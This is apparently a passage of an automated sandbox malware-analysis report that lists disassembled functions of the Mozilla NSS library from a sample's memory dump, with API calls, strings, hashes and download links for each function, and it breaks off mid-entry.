PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C824CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C824D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C824D37

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C824D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C824D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C824D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C824DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C824DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C824E20

Strings

pulSize = 0x%p, xrefs: 6C824DB7
*pulSize = 0x%x, xrefs: 6C824E1B
hSession = 0x%x, xrefs: 6C824D12, 6C824D22
C_GetObjectSize, xrefs: 6C824CEE
hObject = 0x%x, xrefs: 6C824D65, 6C824D75
(CK_INVALID_HANDLE), xrefs: 6C824D30, 6C824D83

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: dc011dd4eb77816de932afdc2849693b24f9a96a8024f37ca98288eaaddc7c55
Instruction ID: eaaff3d7ca4454065e546ca15efbd848c79290b62ac515306f0e31d9d202e4a9
Opcode Fuzzy Hash: dc011dd4eb77816de932afdc2849693b24f9a96a8024f37ca98288eaaddc7c55
Instruction Fuzzy Hash: AE41F471605104EFD7109F54DE8DB6A37B5EBD231EF944829E8086BB11DB38D988CBE1

Function 6C822F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C822F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C822F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C822F63

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C822F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C822F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C822FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C822FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C822FE7

Strings

ulOldLen = %d, xrefs: 6C822FB0
hSession = 0x%x, xrefs: 6C822F3E, 6C822F4E
(CK_INVALID_HANDLE), xrefs: 6C822F5C
C_SetPIN, xrefs: 6C822F21
ulNewLen = %d, xrefs: 6C822FE2
pNewPin = 0x%p, xrefs: 6C822FC9
pOldPin = 0x%p, xrefs: 6C822F95

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: 448d2389105264c21b7cfc66d16476248ed53350375f69752fd75e514fcc1a53
Instruction ID: b599dcef3184ef9928852554118486b357444161d0177baddb01976bd9b79ad7
Opcode Fuzzy Hash: 448d2389105264c21b7cfc66d16476248ed53350375f69752fd75e514fcc1a53
Instruction Fuzzy Hash: 04310471A05544AFCB20DF54DE4CE5A77B2EB9631DF984425E808A7B11DB38C988CBE1

Function 6C8BCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C8BCC7B), ref: 6C8BCD7A

Part of subcall function 6C8BCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C82C1A8,?), ref: 6C8BCE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C8BCDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C8BCDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C8BCDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C8BCD8E

Part of subcall function 6C7E05C0: PR_EnterMonitor.NSS3 ref: 6C7E05D1
Part of subcall function 6C7E05C0: PR_ExitMonitor.NSS3 ref: 6C7E05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C8BCDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C8BCDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C8BCE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C8BCE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C8BCE48

Strings

getnameinfo, xrefs: 6C8BCDB2, 6C8BCE23
ws2_32.dll, xrefs: 6C8BCD75
getaddrinfo, xrefs: 6C8BCD88, 6C8BCDF9
wship6.dll, xrefs: 6C8BCDE3
freeaddrinfo, xrefs: 6C8BCD9F, 6C8BCE10

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 9ed117fbeba1f6b01ed51c567b1a24605e0a811733d22ade4129e78e1bbf7701
Instruction ID: c6b0c6a1e98511bd936ba0bdf74e4995dac37ed1afbdd9396f811f5893dffe1f
Opcode Fuzzy Hash: 9ed117fbeba1f6b01ed51c567b1a24605e0a811733d22ade4129e78e1bbf7701
Instruction Fuzzy Hash: B511ECA6E1321152EB216E756E0899B39A89B4310DF680E34E80AF1F42FF34D508C3F2

Function 6C856CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C921DE0,?), ref: 6C856CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C856D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C856D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C856D82
DER_GetInteger_Util.NSS3(?), ref: 6C856DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C856DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C856E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C856F19
PK11_DigestBegin.NSS3(00000000), ref: 6C856F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C856F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C857011
PK11_FreeSymKey.NSS3(00000000), ref: 6C857033
free.MOZGLUE(?), ref: 6C85703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C857060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C857087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C8570AF

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 5d8efc8e11938d592f9443446d86d7623d8206487813a26bc110f126d754f5d1
Instruction ID: 49fce953e2c69bf07614b32806c66f900c19bea9cad823f4f34f7534e701151c
Opcode Fuzzy Hash: 5d8efc8e11938d592f9443446d86d7623d8206487813a26bc110f126d754f5d1
Instruction Fuzzy Hash: 9DA15C71A192019BFB708B24DE45B5B32A0DB8131CFA48D3DE919CBB81E7B6D864C753

Function 6C8325D0 Relevance: 24.3, APIs: 16, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C80662E,?,?), ref: 6C83264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C80662E,?,?), ref: 6C832670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C80662E,?), ref: 6C832684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8326C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C8326E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8326F4
PR_Unlock.NSS3(?), ref: 6C83274D
PR_SetError.NSS3(00000000,00000000), ref: 6C8328A9

Part of subcall function 6C843440: PK11_GetAllTokens.NSS3 ref: 6C843481
Part of subcall function 6C843440: PR_SetError.NSS3(00000000,00000000), ref: 6C8434A3
Part of subcall function 6C843440: TlsGetValue.KERNEL32 ref: 6C84352E
Part of subcall function 6C843440: EnterCriticalSection.KERNEL32(?), ref: 6C843542
Part of subcall function 6C843440: PR_Unlock.NSS3(?), ref: 6C84355B

PR_Unlock.NSS3(?), ref: 6C8327A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C80662E,?,?,?), ref: 6C8327B5
PR_Unlock.NSS3(?), ref: 6C8327CE
TlsGetValue.KERNEL32 ref: 6C8327E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6C832800

Part of subcall function 6C83F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C83F854
Part of subcall function 6C83F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C83F868
Part of subcall function 6C83F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C83F882
Part of subcall function 6C83F820: free.MOZGLUE(04C483FF,?,?), ref: 6C83F889
Part of subcall function 6C83F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C83F8A4
Part of subcall function 6C83F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C83F8AB
Part of subcall function 6C83F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C83F8C9
Part of subcall function 6C83F820: free.MOZGLUE(280F10EC,?,?), ref: 6C83F8D0

PR_Unlock.NSS3(?), ref: 6C832834
TlsGetValue.KERNEL32 ref: 6C83284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6C832866

Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07AD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07CD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07D6
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C77204A), ref: 6C7E07E4
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,6C77204A), ref: 6C7E0864
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7E0880
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C77204A), ref: 6C7E08CB
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08D7
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08FB

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID:
API String ID: 544520609-0
Opcode ID: bddb8f997a208496718719e4741933b1c97be955147a30fd067d70dd8926b5fe
Instruction ID: c594f5c331d418088c62bb27ed8a42f4b39e08c70589fe5dbb01fad69b55301d
Opcode Fuzzy Hash: bddb8f997a208496718719e4741933b1c97be955147a30fd067d70dd8926b5fe
Instruction Fuzzy Hash: 84B1E770D04215DFDB20DFA8DA88AAAB7B4FF09308F506929DC0967B02E735E954CBD1

Function 6C81AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C7FAB95,00000000,?,00000000,00000000,00000000), ref: 6C81AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C7FAB95,00000000,?,00000000,00000000,00000000), ref: 6C81AF39
PR_Unlock.NSS3(?,?,?,6C7FAB95,00000000,?,00000000,00000000,00000000), ref: 6C81AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C7FAB95,00000000,?,00000000,00000000,00000000), ref: 6C81AF69
TlsGetValue.KERNEL32 ref: 6C81B06B
EnterCriticalSection.KERNEL32(?), ref: 6C81B083
PR_Unlock.NSS3(?), ref: 6C81B0A4
TlsGetValue.KERNEL32 ref: 6C81B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C81B0D9
PR_Unlock.NSS3 ref: 6C81B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C81B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C81B182

Part of subcall function 6C84FAB0: free.MOZGLUE(?,-00000001,?,?,6C7EF673,00000000,00000000), ref: 6C84FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C81B177

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C7FAB95,00000000,?,00000000,00000000,00000000), ref: 6C81B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C7FAB95,00000000,?,00000000,00000000,00000000), ref: 6C81B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C7FAB95,00000000,?,00000000,00000000,00000000), ref: 6C81B1C2

Part of subcall function 6C841560: TlsGetValue.KERNEL32(00000000,?,6C810844,?), ref: 6C84157A
Part of subcall function 6C841560: EnterCriticalSection.KERNEL32(?,?,?,6C810844,?), ref: 6C84158F
Part of subcall function 6C841560: PR_Unlock.NSS3(?,?,?,?,6C810844,?), ref: 6C8415B2

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: dbc039b3ba932a1342a27844f68d5730bfbb29ec22df0417474ec1593d475f99
Instruction ID: 0707dbf9f8410e9b601fb7b2131e0af93ef3912ffc9d9cc468844f5033160e46
Opcode Fuzzy Hash: dbc039b3ba932a1342a27844f68d5730bfbb29ec22df0417474ec1593d475f99
Instruction Fuzzy Hash: E3A1D2B1E042069FEF109F68DD41BFA77B4AF08318F104838E905A7B52E731E959CBA1

Function 6C8CA4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8CA4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8CA4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8CA553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8CA5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8CA5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8CA60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8CA633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8CA671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C8CA69A

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8CA61D, 6C8CA68B, 6C8CA6B3
%s at line %d of [%.10s], xrefs: 6C8CA62C
database corruption, xrefs: 6C8CA627

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: b8d887387c6e448ea6866cc3787c138eac69159a2273e2cf8d0570857f7dbf7e
Instruction ID: af2f6fe623c778da332fb26c5b4b1aad3d79948951b44eefa384624586d8a7c0
Opcode Fuzzy Hash: b8d887387c6e448ea6866cc3787c138eac69159a2273e2cf8d0570857f7dbf7e
Instruction Fuzzy Hash: 415193B1A08304EFDB11CF25D980A9ABBE0AB54318F048C6DF88987651E771DD94CB93

Function 6C86AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C86ADB1

Part of subcall function 6C84BE30: SECOID_FindOID_Util.NSS3(6C80311B,00000000,?,6C80311B,?), ref: 6C84BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C86ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C86AE08

Part of subcall function 6C84B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9218D0,?), ref: 6C84B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C86AE25
PL_FreeArenaPool.NSS3 ref: 6C86AE63
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C86AE4D

Part of subcall function 6C774C70: TlsGetValue.KERNEL32(?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774C97
Part of subcall function 6C774C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774CB0
Part of subcall function 6C774C70: PR_Unlock.NSS3(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C86AE93
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C86AECC
PL_FreeArenaPool.NSS3 ref: 6C86AEDE
PL_FinishArenaPool.NSS3 ref: 6C86AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C86AEF5
PL_FinishArenaPool.NSS3 ref: 6C86AF16

Strings

security, xrefs: 6C86ADEE

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: ae5aad8da44bf80de44c6f1d3d92d206d20d1aabc890f0249c3adcdabe1234e9
Instruction ID: 0ee137703aec5e05363dc292a63ce798294ffe9d171883ab2cabe72e7ef08d18
Opcode Fuzzy Hash: ae5aad8da44bf80de44c6f1d3d92d206d20d1aabc890f0249c3adcdabe1234e9
Instruction Fuzzy Hash: 41413BB590462467EB318B2A9F45BFB32A4AF4231CF500D35E81492F41F775D918C6E3

Function 6C826500 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_EncryptFinal), ref: 6C826526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C826554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C826563

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C826579
PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6C826595
PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6C8265B0
PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6C82661A

Strings

*pulLastEncryptedPartLen = 0x%x, xrefs: 6C826615
pLastEncryptedPart = 0x%p, xrefs: 6C826590
hSession = 0x%x, xrefs: 6C82653E, 6C82654E
pulLastEncryptedPartLen = 0x%p, xrefs: 6C8265AB
(CK_INVALID_HANDLE), xrefs: 6C82655C
C_EncryptFinal, xrefs: 6C826521

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal
API String ID: 1003633598-2178457252
Opcode ID: b40a9ed7bb28a4846db4a10ad03a8a8202c7a610fef6d3e68450801d2dee5210
Instruction ID: 999b60b6d94eca66fa2806b7d4d46a767a0e5c85f48cae8075cb6f3d8fd1fe23
Opcode Fuzzy Hash: b40a9ed7bb28a4846db4a10ad03a8a8202c7a610fef6d3e68450801d2dee5210
Instruction Fuzzy Hash: 86310231A05144EFDB109F58DE8CF5A37B1AB9631DF984829E80897B11DB38DA88CBD1

Function 6C90AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8B9890: TlsGetValue.KERNEL32(?,?,?,6C8B97EB), ref: 6C8B989E

EnterCriticalSection.KERNEL32(?), ref: 6C90AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C90AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C90AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C90AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C90B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C90B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C90B070
PR_JoinThread.NSS3(?), ref: 6C90B07B
free.MOZGLUE(?), ref: 6C90B084
EnterCriticalSection.KERNEL32(?), ref: 6C90B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C90B0C4
PR_JoinThread.NSS3(?), ref: 6C90B0F3
free.MOZGLUE(?), ref: 6C90B0FC
PR_JoinThread.NSS3(?), ref: 6C90B137
free.MOZGLUE(?), ref: 6C90B140

Memory Dump Source

